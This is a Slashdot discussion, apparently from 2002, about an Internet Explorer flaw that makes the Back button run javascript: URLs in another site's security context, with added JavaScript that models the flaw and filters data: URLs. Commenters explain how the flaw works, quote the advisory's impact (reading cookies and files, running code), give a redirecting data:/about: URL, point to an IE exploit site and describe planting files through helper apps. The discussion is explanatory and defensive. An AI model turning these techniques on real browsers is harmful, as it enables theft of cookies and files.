    2. Re:A complete list by jesser · · Score: 4, Informative

      I wouldn't call this a "dumb ass bug". It's subtle, and finding it requires being aware of several things and thinking to combine them:

      * javascript: URLs run in the security domain of the page from which they originate. (Or, if they're stored in the user's bookmarks, they run as part of the current page, letting them do cool things like show the HTML source of the selection.)

      * If a javascript: URL returns a non-null value, it acts like a data: URL. For example, javascript:1+2;3+4 is equivalent to data:text/html,7. (Most of the time, this is just an annoyance, forcing you to put "void 0" at the end of a javascript: URL unless you're sure that the last calculation always returns null.)

      * It is possible to go "forward" from a javascript: URL.

      * The Back button incorrectly runs a javascript: URL in the security domain and context of the current page instead of running it with no context or with the context of the page that put the URL in session history.

      The fact that the bug was present in both IE and Mozilla until Mozilla 0.9.3 is strong evidence that the hole is not an obvious "dumb ass bug". I only discovered the hole because I make bookmarklets (javascript: URLs) in my free time and was being paid by Netscape to work on Mozilla security last summer.

      --
      The shareholder is always right.
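As an added illustration of the third and fourth bullets in the post above (example code written for this page, not the poster's, Mozilla's or IE's code), here is a toy session-history model in JavaScript. Each javascript: entry records the origin of the page that created it; back() then shows the difference between resolving that entry against the page being left (the behaviour the bug describes) and against the recorded creator (what the post says the fix should do). The origins attacker.example and trusted.example and the placeholder javascript: URL are constructed sample values.

```javascript
// Added example: a minimal model of browser session history that tracks which
// origin created each javascript: entry, so the effect of the Back-button bug
// can be shown without a real browser. Not the code of any real browser.

const ORIGIN_UNTRUSTED = "http://attacker.example"; // constructed sample origin
const ORIGIN_TRUSTED = "http://trusted.example";    // constructed sample origin

class SessionHistory {
  constructor() {
    this.entries = [];
    this.index = -1;
  }

  // Record a navigation. A javascript: URL is stored with the origin of the
  // document that triggered it; an ordinary URL carries its own origin.
  navigate(url, fromOrigin) {
    const entry = url.startsWith("javascript:")
      ? { url, kind: "script", creatorOrigin: fromOrigin }
      : { url, kind: "document", creatorOrigin: new URL(url).origin };
    this.entries = this.entries.slice(0, this.index + 1); // drop any forward entries
    this.entries.push(entry);
    this.index = this.entries.length - 1;
  }

  current() {
    return this.entries[this.index];
  }

  // Go back one entry and return the origin under which that entry's content
  // would run. policy is "buggy" (run a javascript: entry in the context of
  // the page just left) or "fixed" (run it as the page that created it).
  back(policy) {
    if (this.index <= 0) return null;
    const leavingOrigin = this.current().creatorOrigin;
    this.index -= 1;
    const target = this.current();
    if (target.kind === "document") return target.creatorOrigin;
    return policy === "buggy" ? leavingOrigin : target.creatorOrigin;
  }
}

// The sequence the post describes: an untrusted page puts a javascript: URL in
// history, the user goes forward to a trusted page, then presses Back.
// Returns the origin the javascript: entry would execute under.
function backButtonScenario(policy) {
  const history = new SessionHistory();
  history.navigate(ORIGIN_UNTRUSTED + "/start", null);
  history.navigate("javascript:'placeholder'", ORIGIN_UNTRUSTED); // created by the untrusted page
  history.navigate(ORIGIN_TRUSTED + "/account", ORIGIN_UNTRUSTED);
  return history.back(policy);
}

// True when the policy lets the untrusted page's script run as the trusted origin.
function crossesOriginBoundary(policy) {
  return backButtonScenario(policy) === ORIGIN_TRUSTED;
}

console.log("buggy policy runs script as:", backButtonScenario("buggy"));
console.log("fixed policy runs script as:", backButtonScenario("fixed"));
```

The model only covers origin assignment; it does not evaluate the javascript: URL, and it treats the entry as navigable regardless of what the URL would return (the post's second bullet explains why a non-null return value is what makes it a real history entry).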
    3. Re:A complete list by maxpublic · · Score: 2, Insightful

      I think it might qualify as a "dumb ass bug" because despite having been informed of the problem last November MS failed to fix the exploit - even after their two-month 'security review'.

      So the bug went from 'subtle' in November to 'dumb ass' today because the lackwits in Redmond completely ignored it - hence the label. As in, "only a dumb ass would ignore this bug".

      Max

      --
      My god carries a hammer. Your god died nailed to a tree. Any questions?
  15. Go Mozilla Anyways! by KagatoLNX · · Score: 4, Insightful

    Bench the latest Mozilla build (turn off debugging and turn on optimization, just like a normal release build) and post that again. Of course, to really shine, run it on Linux or a free BSD.

    Seriously, it's fast and its implementation of little things like CSS (which as far as I'm concerned is the future of online content) is light years ahead of IE anyways.

    Then again, you might be interested to know that as of IE 5.5, IE was backported from the Macintosh version. That's right, the MS-IE-Mac-port team did it so much better that they backported it to Windows. That's where the speed and decent standards support came from!

    I think that this goes to show that Microsoft doesn't re-write something from scratch on purpose. They had to force their Mac team to basically do so (because, like, it's IE not on Windows, you have to redo a bunch of stuff) before they figured out that they needed to reimplement. The sad thing is that they don't seem to be willing to do it where it counts, no matter how "security focused they become" they don't ever figure out that it's impossible to effectively rewrite Windows "a piece at a time".

    --
    I think Mauve has the most RAM. --PHB (Dilbert Comic)
    1. Re:Go Mozilla Anyways! by crisco · · Score: 2
      Then again, you might be interested to know that as of IE 5.5, IE was backported from the Macintosh version.
      I'm curious about this, do you have more info or a reference for this? I know that IE 5.5 had a significantly longer startup time than IE 5 on my ancient Win95 computer, but then IE 5.5 still had the CSS box model problems that IE 5 Win had that IE 5 Mac had done correctly (one place I found something on this).
      --
      Bleh!

    2. Re:Go Mozilla Anyways! by KagatoLNX · · Score: 2, Interesting

      Mmmmmmmm. I can't find the pages anymore. I found that tidbit in a link off of an old topic on /. (remember when MS was about to release 5.5 with little to no CSS1 and DOM support and the W3C raised hell?). I can't seem to find it anymore. After more thinking, I think it was just the rendering engine, and they may have slid it in a Service Pack (SP1?).

      You can find a few articles around the web about IE 5.5 for Mac doing it right, but I can't find the explicit reference to the codebase being ported.

      Well, there are 3 options:
      1) I'm wrong (very possible)
      2) I heard it on the Internet so it must be true (see #1)
      3) The Microsoft Censorship Conspiracy (possible, but paranoid)
      4) It really happened that way.

      Pick the one you like, but that's what my memory recalls.

      --
      I think Mauve has the most RAM. --PHB (Dilbert Comic)
    3. Re:Go Mozilla Anyways! by Darren+Winsper · · Score: 2

      IE5.5 was not backported from the Mac version. If they did, they certainly broke a lot of it. IE6 I could see, although I doubt it, it's more likely they simply improved the IE5.5 engine.

      As for Mozilla being lightning fast, this isn't so. OK, it's not bad at HTML and CSS, but its DOM support is too slow right now. It's complete, but lacks speed, and it's not going to improve much until post-1.0.

    4. Re:Go Mozilla Anyways! by MindStalker · · Score: 2

      Document Object Model. Generally it's a hierarchy of variables about your page (basically everything on the page can be referenced in some way) that javascript (or some other method) can reference and change. The speed of this reference matters for dynamic web pages, but I have seen very little evidence showing that mozilla has a slow DOM, but a LOT of discussion about it.

  16. Makes it easy to explain M$ vs. Free Soft by mattr · · Score: 2

    At first I thought wuh? But of course I was in Mozilla, so I didn't see the problem. IE executed its exploit right away.

    Free Software ought to get better press from this, as it underscores a major truism.

    In Free Software, new versions are generally made and released due to added functionality or fixed bugs. Anything else is a waste of time for the programmers, right?

    With the exception of a very huge vulnerability that was finally fixed with IE SP2 (though who knows what else that contained), new software versions from Microsoft seem due to an entirely different set of reasons, like:

    - breaking more fledgling standards
    - making news
    - embracing/extending
    - press releases
    - etc

  17. Re:hm by jspaleta · · Score: 2, Insightful

    " I still can't figure out why people are using IE, seriously."

    1)Bundled....people are sheep.
    2)Bundled.....a lot of people don't have the band or the patience to do a lot of downloading (AOL users on dialup)
    3)Bundled...on a corporate win2k desktop where the user just logs in and can't really install much in the way of software...see 1) s/pc support personal/people

    -jef

  18. yay for NAI by diesel_jackass · · Score: 4, Interesting

    http://diesel.2y.net/mine.htm

    my McAfee VirusScan already checks for this bug.

    1. Re:yay for NAI by Tryfen · · Score: 2, Informative

      However, because it is not usually possible to clean or delete the offending page, it is possible to get the code to run.

      --
      If a square is really a rhombus, why aren't all triangles purple?
    2. Re:yay for NAI by diesel_jackass · · Score: 2

      IE or virusscan?

      I guess it really doesn't matter because neither of them ever crash for me.

  19. RTFE (exploit) by gartogg · · Score: 5, Informative

    If you read the exploit, you would see why this would not be possible.

    You do not need to actually press the button, but you need to do it from a trusted page.

    --
    I'm a conscientious .sig objector.
  20. yearning for the past by Faust7 · · Score: 4, Insightful

    When I spent hours in labs browsing with Netscape 2.0...

    When a webpage wasn't something you had to figure out how to escape...

    When 'Back' meant back...

    When there was just smooth uninterrupted navigation, and no pop-ups or banners...

    When people could say pretty much say anything anywhere, no DMCA...

    ... remember that?

    1. Re:yearning for the past by mosch · · Score: 2
      ah yes, NetRape. Remember the good ole' days, when Netscape was the non-standards-compliant enemy, embracing and extending HTML?

      Yeah, but you used it anyway, because it could show you the text of the webpage while the images were still downloading, but shitty ole' mosaic you had to wait for all the images, before you could see anything at all....

    2. Re:yearning for the past by Gary+Yngve · · Score: 2

      I remember using lynx in 1994.

      Nothing beats:

      Would you like to quit? (y/n)

      Excellent!

      I remember downloading a zmodem client over SuperKermit on a 2400 baud modem.

      I was so ignorant and innocent back in those days... some of my friends did not have Internet access, so we all shared the same account and voluntarily did not read each other's email (although that sometimes happened accidentally if we were not careful with mailx).

      And the joys of figuring out for the first time how to use rm on a file named '-'... Wow, I could go on and on about the old days...

      And I'm sure some folks here can tell even older stories.

    3. Re:yearning for the past by Ioldanach · · Score: 2

      ah yes, NetRape. Remember the good ole' days, when Netscape was the non-standards-compliant enemy, embracing and extending HTML?

      Yeah, but you used it anyway, because it could show you the text of the webpage while the images were still downloading, but shitty ole' mosaic you had to wait for all the images, before you could see anything at all....

      And don't forget the other part... when netscape first came out, IIRC, mosaic could only render gifs, and netscape could render jpegs.

    4. Re:yearning for the past by Genom · · Score: 2

      In HS, I was one of the "privileged few" that got to share a 1200 baud connection to the local university's Gopher system. Ahh...those were the days.

      Later, I found out that simply exiting the gopher client would have dropped me to a true unix shell - but I didn't know that at the time. I could have started my Unix education 2 years earlier!

  21. How about from a frame? by roystgnr · · Score: 2

    Would it be possible for a malicious page to load a trusted page in another frame, pause for it to load, then execute a back() in that frame? There are loads of things that javascript isn't allowed to do in a frame from another website, but is back() among them?

  22. If MS had acted... any number of times... by Wee · · Score: 5, Informative
    If they had waited til tomorrow, they'd have known about M$'s fix for this dangerous security hole.

    If MS had responded back in November when he made the sploit known, or if they had even thought once about security when designing IE, or if they had any kind of decent security model in the OS, or, or, or... then this never would have happened in the first place and MS wouldn't have to patch the barn door after the horse had left. But don't blame the guy who discovered this by trotting out that "don't tell anyone about the security hole until the vendor can fix it" pablum. Security through obscurity isn't, especially when that obscurity is driven by the needs of the marketing group.

    You find a hole, you do due diligence, they don't respond (he gave them months to fix it fer cryin' out loud), you publish. Then, most likely, the vendor publishes a fix based on the real needs of users and not the perceived needs of some business unit looking at a bottom line.

    It boggles my mind that one could have a machine rooted simply by browsing the web. A die-hard MS nut at work today was giving me grief over the fact that Red Hat has "published" 500MB of "updates" to "Linux" since version 6.2 and how could the OS be so insecure as to need that many updates... I didn't even have the energy to respond. And I'm all for people running with whatever works for them, but at least I know for a fact that Opera on my machine runs in userland and won't get me rooted. And hopefully, using your favorite browser won't mean data loss and/or a re-image of the OS as well.

    But to blame the guy who discovered it? I mean, honestly, for fsck's sake: we're talking about a web browser, you know? Completely compromising a machine via a back button? And it's been known for five months?!? At least MS could tell users to run another browser until they can fix the issue. Or turn scripting off. Or whatever. The fact that it could happen in the first place is just obscene. Or criminal. MS leaves a bad taste in my mind sometimes...

    -B

    --

    Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.

    1. Re:If MS had acted... any number of times... by NoMoreNicksLeft · · Score: 2

      I agree totally with your assessment. However, this happens over and over... in the course of your average week! I'm sorry if I can't even be serious about this anymore, but I hope you realize I was making a rather dumb joke. I'm kinda surprised that it was even modded up. Really. The entire M$ security situation is so sick anymore, that my humor is probably on the level of really lame vaudeville comedy or something.

      Remember these two words. "Trustworthy computing".
      *laugh* *laugh* *sob* *sob* *bang* (putting pistol to head, and pulling the trigger, rather than have to support M$ products)

    2. Re:If MS had acted... any number of times... by Wee · · Score: 2
      I'm assuming that was a typo and you meant pabulum, insipid ideas, yes?

      Actually, I meant it the way it was spelled. And now that I look at it, dictionary.com has different ideas about what pablum and pabulum mean. But I meant insipid, yes.

      In reply to the content of your comment: I'm not too great on my NT security, but I understand (from my own experimentation) that IE (at least parts of it) runs in the "system" context under win2k. Is this true? Does anyone care to explain why this is necessary? Why does it require elevated privileges?

      I dunno. The last MS OS I actually installed and used for any length of time was Windows98SE. I've used Win2k and XP very briefly, and I had an NT4 machine at work for a while. So I'll have to guess:

      Since IE is "part" of the OS, it must be able to interact with various underlying system calls outside the confines of any normal security model? Some Win32 pigs are more equal than others? Surely MS gives other developers similar hooks through their DevNet program...

      -B

      --

      Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.

    3. Re:If MS had acted... any number of times... by civilizedINTENSITY · · Score: 2

      It was funny and deserved to be modded up. Especially the "Really Safe Back Button"! :-)

    4. Re:If MS had acted... any number of times... by bgarcia · · Score: 2
      That was a pretty knee-jerk reaction to what was obviously meant to be humor.

      Next time, try reading the *whole* article before replying.

      --
      I'm a leaf on the wind. Watch how I soar.
    5. Re:If MS had acted... any number of times... by DrXym · · Score: 2
      If you do respond to the guy asking why RH 6.2 had so many updates, remind him that those patches are for an OS, a webserver, an ftp server, an ssh server, file/print services, C++/Java/Perl development, editors, office applications, databases and a ton more besides.


      If you totalled up all the patches required to fix a machine filled with MS software it would probably be not much different. Except of course it would be different in that RH (and other Unix/Linux distros) release patches in a timely fashion whereas MS doesn't.

    6. Re:If MS had acted... any number of times... by Wee · · Score: 2
      I'm not much of a Redhat guy, so I don't know how they issue updates. Are those 500MB all security updates, or are they full updates to the system?

      I never bothered to even count up the size of the packages, but apparently that's the size of every rpm released as an update since version 6.2. That's the diff between 6.2 and 7.0, 7.0 and 7.1, 7.1 and 7.2, all 7.2 errata. I can believe that there are 500MB of updates. Whether it shows how insecure Linux is compared to any other OS is hooey.

      -B

      --

      Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.

    7. Re:If MS had acted... any number of times... by Tony-A · · Score: 2

      You can laugh or you can cry. Laughing's better.
      The situation is so ridiculous that I've stopped worrying about keeping up with patches for a year or so. An up-to-date patched system is not fundamentally any safer than an old unpatched system, and considering things like "Really Safe Back Button", may well be even riskier.
      "Trustworthy computing". In a world where Microsoft Windows Me quickly recovers from deleting the software that runs worms and viruses, it's not gonna happen.

    8. Re:If MS had acted... any number of times... by Tony-A · · Score: 2

      They're so you can upgrade from 7.2 to 6.2.
      Depending on exactly what version of what you are running, it's not as ridiculous as it sounds.
      Seriously, RedHat is becoming pro-active, like OpenBSD and later FreeBSD, and closing up the hidey-holes where bugs and exploits might be lurking.
      If you want to compare security, look at how hard it is to find a new exploit. Microsoft Windows looks like it still has a lot of low-hanging fruit.

    9. Re:If MS had acted... any number of times... by Software · · Score: 2
      A die-hard MS nut at work today was giving me grief over the fact that Red Hat has "published" 500MB of "updates" to "Linux" since version 6.2 and how could the OS be so insecure as to need that many updates
      Are you sure he wasn't pointing out how few updates RedHat has? I just checked the Windows Update site on my copy of Windows XP, and it reports that, for Critical Updates, it needs to install:

      Total (including prerequisites): 13 {files} = 19 MB, < 1 minute

      This is for an operating system that's been out for, what, six months? And that doesn't include patches to all parts of the system; this is mostly IE! I'm not sure that it's all of the updates for XP, either. The earliest item on the list is Feb 9 2002, so there may have been items earlier.

  23. Reply by aozilla · · Score: 2

    I tried to reply to say "At least slashdot doesn't have any bugs in it", but the reply button wasn't working...

    --
    ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
  24. I wouldn't hedge my bets on Mozilla so blindly. by Starship+Trooper · · Score: 2, Informative
    Mozilla has its share of problems too; it's just that the media is so busy fawning over the bleeding-heart "David vs. Goliath" vision of Mozilla (much like that given to Linux in the old IPO rush days) to highlight these troubles. One particularly nasty problem Mozilla has is the ability to encode arbitrary data into a URL starting with "data:". This misfeature alone is enough for me to keep Mozilla off all my high-security computer systems until the project decides to either a) remove this "feature" as the debugging relic it is or b) add a preference to disable it, like Javascript or animated images.

    For those not aware of this problem, here's a synopsis. Mozilla will parse a URL of the form "data:content/type;encoding,rawdata" and treat it as a file of the type given. For example, the URL "data:text/html;identity,<meta http-equiv="refresh" content="0;http://www.google.com/">" will create an HTML page that will immediately shunt you to google.com. Open up Mozilla and paste that URL in if you don't believe me. Using an encoding type of "base64", images, data files and even executables can be hidden inside a URL. Trolls have already exploited this numerous times for mundane things like embedding goatse.cx links; imagine if some malicious hacker were to design a page with a trojan .exe or shellscript embedded in an innocuous-looking URL!

    While "data:" URLs can be filtered out with Proxomitron or avoided by careful scanning of the status bar before clicking any link, I think such a glaringly wide target for abuse doesn't belong in any project past the alpha-test stage, much less one that is getting ready to make a highly-publicised 1.0 release in the upcoming weeks. Until this hole is patched, I would recommend Konqueror to you. It no longer "crash[es] constantly anyway", as you put it; the 3.0 release is incredibly stable, supports made-for-IE sites much better than Moz, and also has more than adequate standards support. I would suggest rethinking your Mozilla deployment strategy and giving Konq another go.

    --
    Loneliness is a power that we possess to give or take away forever
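To make the data: URL format described in the post concrete, here is an added example written for this page (it is not Mozilla's URL parser and not Proxomitron's filter rules): a parser for data:[<mediatype>][;base64],<data> following the RFC 2397 shape, plus a classifier of the kind a link filter or status-bar check could use to label what a data: link actually carries, including a magic-byte check for a Windows PE ("MZ") or ELF binary that has been labelled as an image. Unknown parameters such as the post's ";identity" are ignored rather than rejected. The sample URLs are constructed inline; the refresh one is the post's own.

```javascript
// Added example: parse and classify data: URLs. Not code from Mozilla,
// Proxomitron or the Slashdot post; sample URLs below are constructed.

// Parse data:[<mediatype>][;base64],<data>. Returns null for anything that is
// not a data: URL or lacks the comma separating header from payload.
function parseDataUrl(url) {
  if (!/^data:/i.test(url)) return null;
  const comma = url.indexOf(",");
  if (comma === -1) return null; // malformed: no payload
  const header = url.slice("data:".length, comma);
  const rawData = url.slice(comma + 1);
  const params = header.split(";");
  // First header element is the media type; RFC 2397 defaults it to text/plain.
  const mediaType = params.shift().toLowerCase() || "text/plain";
  const isBase64 = params.some((p) => p.toLowerCase() === "base64");
  let bytes;
  if (isBase64) {
    bytes = Buffer.from(rawData, "base64");
  } else {
    let text;
    try {
      text = decodeURIComponent(rawData); // payload is percent-encoded text
    } catch (e) {
      text = rawData; // bad percent escapes: keep the raw text
    }
    bytes = Buffer.from(text, "utf8");
  }
  return { mediaType, isBase64, bytes, text: bytes.toString("utf8") };
}

// True if the payload starts like a Windows PE ("MZ") or ELF ("\x7fELF") file.
function looksExecutable(bytes) {
  if (bytes.length >= 2 && bytes[0] === 0x4d && bytes[1] === 0x5a) return true;
  return bytes.length >= 4 && bytes[0] === 0x7f && bytes[1] === 0x45 &&
    bytes[2] === 0x4c && bytes[3] === 0x46;
}

// Label a data: URL by what it would hand the browser. The executable check
// runs before the media-type check so a binary disguised as an image is caught.
function classifyDataUrl(url) {
  const parsed = parseDataUrl(url);
  if (!parsed) return "malformed";
  if (looksExecutable(parsed.bytes)) return "executable";
  if (parsed.mediaType === "text/html") return "html"; // may carry scripts or a refresh
  if (parsed.mediaType.startsWith("text/")) return "text";
  if (parsed.mediaType.startsWith("image/")) return "image";
  return "binary";
}

// Constructed sample inputs. "disguisedExe" is a few PE-header bytes labelled
// as a GIF; "blob" is four arbitrary bytes (00 01 02 03).
const SAMPLE_URLS = {
  refresh: 'data:text/html,<meta http-equiv="refresh" content="0;http://www.google.com/">',
  hello: "data:text/plain;base64,SGVsbG8=",
  disguisedExe: "data:image/gif;base64," +
    Buffer.from("MZ\u0090\u0000\u0003", "latin1").toString("base64"),
  blob: "data:application/octet-stream;base64,AAECAw==",
  malformed: "data:text/plain",
};

// Classify every sample and return a name -> label map.
function classifyAll(urls) {
  const out = {};
  for (const [name, url] of Object.entries(urls)) out[name] = classifyDataUrl(url);
  return out;
}

console.log(classifyAll(SAMPLE_URLS));
```

A filter built on this would typically allow "text" and "image" labels, warn on "html", and block "binary" and "executable"; the point of decoding the payload rather than trusting the declared media type is that the label in the URL is chosen by whoever wrote the link.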
    1. Re:I wouldn't hedge my bets on Mozilla so blindly. by _bobs.pizza_ · · Score: 2, Informative
      Try using the same thing with IE, using about: instead....
      about:text/html;identity,<meta http-equiv="refresh" content="0;http://www.google.com/">
      That just loops forever, refreshing the page, but you can put any valid HTML/JavaScript/VBScript code that you want in that and it does it.

      This code is kept in the Internet Zone, so you can't be as malicious as you'd like. It does make an HTML page w/ whatever you put.
    2. Re:I wouldn't hedge my bets on Mozilla so blindly. by Yottabyte84 · · Score: 2

      You can just click here then click the link on the resulting page.

  25. Used to be in Mozilla by jesser · · Score: 4, Interesting

    I found the same bug in Mozilla last summer while I was working at Netscape. My boss fixed it within a week, so versions after Mozilla 0.9.3 did not have the bug. It was bug 88167 if you're interested. I'm not sure why I didn't notice that IE was vulnerable as well. Anyone want to go through old Mozilla security holes and see how many of them affect IE 6?

    Anyway, keep using that Back button. If you're using IE to browse warez/porn, you have more to worry about than someone looking at your cookie for another site. An attacker could just copy the IE exploit of the week from
    http://jscript.dk/unpatched/. I believe that page has had current IE security holes that allow running arbitrary instructions for two months straight. (That means you can keep up with the latest IE patches, but if an attacker reads jscript.dk and can get you to click a link in AIM or read a message in OE, the attacker wins.)

    By the way, what's with IE turning every cross-domain hole into a full remote compromise by letting sites link to res: urls? Current versions of Mozilla block links to chrome/res and even file, so a cross-domain hole doesn't even let sites read local files.

    --
    The shareholder is always right.
    1. Re:Used to be in Mozilla by bgarcia · · Score: 2
      Current versions of Mozilla block links to chrome/res and even file, so a cross-domain hole doesn't even let sites read local files.
      This is a rather annoying *feature* of mozilla. If an http: page has a link (just a link!) to a file: URL, then what possible security issue is there?

      This case should be handled differently than the others. Many intranet servers have valid reasons for supplying file: URL's to employees.

      --
      I'm a leaf on the wind. Watch how I soar.
    2. Re:Used to be in Mozilla by jesser · · Score: 2

      See http://bugzilla.mozilla.org/show_bug.cgi?id=84128#c20. That explains why it's necessary to block links to file:/// urls. It also describes a hidden pref you or your corporation can set that will allow links to file:/// urls if backwards-compatibility is more useful than increased security.

      --
      The shareholder is always right.
    3. Re:Used to be in Mozilla by bgarcia · · Score: 2
      See http://bugzilla.mozilla.org/show_bug.cgi?id=84128#c20. That explains why it's necessary to block links to file:/// urls.
      (heh, I filed that bug). Again, this does NOT explain why a plain old link with no javascript involved cannot be allowed.

      The problem is that mozilla handles all file references the same way, and it causes some safe cases to be disallowed.

      It also describes a hidden pref you or your corporation can set that will allow links to file:/// urls if backwards-compatibility is more useful than increased security.
      But I don't want to disable this security unilaterally for exactly the reasons stated in the URL you provided! All I want is for mozilla to recognize the cases where a "file:" URL is actually safe and allow it to be clicked.

      And at the very least, mozilla should tell the user why clicking on such a link results in nothing happening (see bug 84128).

      --
      I'm a leaf on the wind. Watch how I soar.
    4. Re:Used to be in Mozilla by bgarcia · · Score: 2
      the DoS attack linking to /dev/zero
      Try typing "file:///dev/zero" into Mozilla's address bar. There is no DoS. It asks you want to do with the binary file.
      checking whether a file exists
      Again, how is this accomplished with a plain old hyperlink?
      planting a file using a helper app
      Again, how is this accomplished with a plain old hyperlink? No java, no javascript, just a plain old <a href> tag.
      --
      I'm a leaf on the wind. Watch how I soar.
    5. Re:Used to be in Mozilla by jesser · · Score: 2

      The DoS attack: I guess I was wrong there.

      Checking whether a file exists: you get the user to click on the link, and then you use javascript to see what happens after that. (This isn't the end of the world, and it requires enough user interaction that a page wouldn't be able to run a systematic search.)

      The helper app problem: you get the helper app to plant a file in a known location, and then you link to the planted file. The browser opens the file, and since it's on your hard drive, it has somewhat elevated privs. IIRC, it can read any text or html or xml file on your hd. (I think the real problem here is that local files have too many extra privs, since a user might save a page intentionally. It might be possible to change that, at least in the browser.)

      So maybe you're right.

      --
      The shareholder is always right.
    6. Re:Used to be in Mozilla by bgarcia · · Score: 2
      Checking whether a file exists: you get the user to click on the link, and then you use javascript...
      And I have no problem with blocking links with javascript attached to them. But plain-old, non-javascript links have no security issues, and should be allowed.
      The helper app problem: you get the helper app to plant a file in a known location...
      If you have a "helper app" that's planting malicious files on your hard drive, then file: hyperlinks are the least of your problems.
      So maybe you're right.
      Now, if I can only convince some of the Mozilla developers...
      --
      I'm a leaf on the wind. Watch how I soar.
    7. Re:Used to be in Mozilla by jesser · · Score: 2

      And I have no problem with blocking links with javascript attached to them. But plain-old, non-javascript links have no security issues, and should be allowed.

      What do you mean by "plain-old, non-javascript links"? The link could be an ordinary a-href and the javascript could be elsewhere on the page.

      If you have a "helper app" that's planting malicious files on your hard drive, then file: hyperlinks are the least of your problems.

      Any web browser has to put files in its cache, and many helper apps do the same thing.

      --
      The shareholder is always right.
    8. Re:Used to be in Mozilla by bgarcia · · Score: 2
      What do you mean by "plain-old, non-javascript links"? The link could be an ordinary a-href and the javascript could be elsewhere on the page.
      I mean a hyperlink that, when clicked, results in no javascript being run (regardless of how the javascript appears in the page).

      I think it would be even better if, when a user clicks on a file: hyperlink, javascript is temporarily disabled until after the new file loads.

      Any web browser has to put files in its cache, and many helper apps do the same thing.
      But only a malicious app would put a file onto disk, and then attempt to trick you into clicking on a link to access it.

      Look, all I'm saying is that there are legitimate uses for file: hyperlinks in http: pages, usually in a business's intranet. I think it is a mistake to disallow all such instances in the name of security (or to have an option to disable all of the security), when we could change the security model to allow the safe instances to work.

      --
      I'm a leaf on the wind. Watch how I soar.
    9. Re:Used to be in Mozilla by jesser · · Score: 2

      But only a malicious app would put a file onto disk, and then attempt to trick you into clicking on a link to access it.

      The problem isn't malicious helper apps. It's malicious web pages and helper apps that aren't familiar with the idea "cache your stuff in a random place because some web browsers let web pages link to local files and then automatically grant local files the ability to read other local files". The web page gets the helper app to put the file in a known location, and then the web page links to that location.

      --
      The shareholder is always right.
  26. Not really by Pope+Slackman · · Score: 2

    1)Bundled....people are sheep.
    2)Bundled.....a lot of people don't have the band or the patience to do a lot of downloading (AOL users on dialup)
    3)Bundled...on a corporate win2k desktop where the user just logs in and can't really install much in the way of software...see 1) s/pc support personal/people

    I don't really think so.

    Up until recently (i.e. Moz and Opera maturing in to decent browsers) IE was the best game in town, it was just an added bonus that it came bundled.
    Netscape 4.x has been a joke since IE's renderer got good (around 4.5, I'd say), and Netscape 6.0 release bugs scared a lot of people off.
    Most people have never even heard of Opera.

    However, if the new browsers keep improving, and IE holes keep appearing with this kind of severity, I can see people downloading other browsers, just like they used to.
    But really, until late last year, IE, in all its mediocrity, was still the best for most people's browsing.
    It's reasonably stable, reasonably fast and renders pages reasonably well.
    There was no incentive to switch to something either obsolete (old Netscape), slow (new Netscape), buggy (Mozilla), or pretty much unknown (Opera).

    There might be now.

    C-X C-S

    1. Re:Not really by jspaleta · · Score: 2

      "There was no incentive to switch"
      ...because it's bundled...

      http://www.m-w.com/cgi-bin/dictionary

      sheepish
      1 : resembling a sheep in meekness, stupidity, or timidity

      stupidity
      1 : the quality or state of being stupid

      stupid
      4 a : lacking interest or point

      incentive
      : something that incites or has a tendency to incite to determination or action
      synonym see MOTIVE

      motive
      1 : something (as a need or desire) that causes a person to act

      You say
      "There was no incentive to switch"
      I say
      Bundled...people are sheep

      lets call the whole thing off.

      -jef

    2. Re:Not really by Pope+Slackman · · Score: 2

      You say
      "There was no incentive to switch"
      I say
      Bundled...people are sheep


      Why would I switch to something that sucks compared to what I already have?
      It's like trading in the Acura you already have for a Yugo.
      So what if the better product is what you already have?

      Or are you just another bitter Netscape zealot looking for an excuse to berate MS because they wrote an (at the time[1]) better browser?

      C-X C-S
      [1] "At the time", because browser lines are blurring rapidly. I can make a page W3C compliant, with CSS2, layers and most of the fun stuff, and still have it render basically the same in recent IE, Mozilla or Opera.
      [Netscape 4.x can't render it for shit tho, even when the W3C validator gives it a perfect score.]

    3. Re:Not really by jspaleta · · Score: 2


      Or are you just another bitter Netscape zealot looking for an excuse to berate MS because they wrote an (at the time[1]) better browser?

      I'm not berating MS on how good or bad IE is. That was the parent poster. I was just giving input as to why no one has Opera installed. There is a large segment of the population that would probably use Opera if it were the browser preinstalled, or even crappy old Netscape 4.x. Most people aren't download happy... if they were, everybody's desktop MS computers would have all the MS updates installed within mere days of security update announcements. And if it isn't a NEEDED update, corporates don't tend to install extra crap on centrally managed Win2k desktops either. If it ain't horribly broken... don't fix it... seems to be the motto of corporate PC support departments everywhere. If some company VP or CEO isn't crying over not having Opera on the system... Opera doesn't get put on the system... because IE is adequately preinstalled. And I'd imagine if Opera were preinstalled... PC support personnel would take the same pains to avoid installing IE on the corporate network. Having PC support departments ONLY officially supporting the preinstalled browser on an internal corporate desktop is going to save hassle, time and money... no matter which browser it is. People are sheep, PC support people are sheep... they take what's given and use it as long as it meets a certain level of usability. The important factor is not the wealth of IE's features... it's IE's preinstalled presence.

      -jef

  27. Re:What are the odds... by SaDan · · Score: 5, Informative
    Read the Bugtraq submission!

    Title: Using the backbutton in IE is dangerous.
    Date: [2002-04-15]
    Software: At least Internet Explorer 6.0.
    Tested env: Windows 2000 pro, XP.
    Rating: Medium because user interaction is needed.
    Impact: Read cookies/local files and execute code
    (triggered when user hits the back button).
    Patch: None.
    Vendor: Microsoft contacted 12 Nov 2001, additional
    information given 25 Mar 2002.
    Workaround: Disable active scripting or never
    use the back button.
    Author: Andreas Sandblad, sandblad@acc.umu.se
    MS was notified late last year... Just over five months ago.

    Read, people... Read, then make comments. It's not that difficult.

  28. Quick patch for the bug by cscx · · Score: 5, Funny

    Here is a way to disable this nasty bug. It should work in all affected versions of IE:

    1. Right click the toolbar, and select "Customize"

    2. Select "Back" in the list marked "Current toolbar buttons"

    3. Click the "Remove" button.

    4. Click close.

    There! Now that bug has been squashed. I suggest you implement this in all corporate deployments of IE pronto.

    1. Re:Quick patch for the bug by nzhavok · · Score: 3, Funny

      I'm undecided on whether this is "Funny" or "Informative".

      --

      He who defends everything, defends nothing. -- Fredrick The Great
  29. The more I know about windows... by jpellino · · Score: 2

    the more i love my mac. none of this did a bloody thing on osx / ie 5.1.4

    maybe it's the fix we got today, though

    --
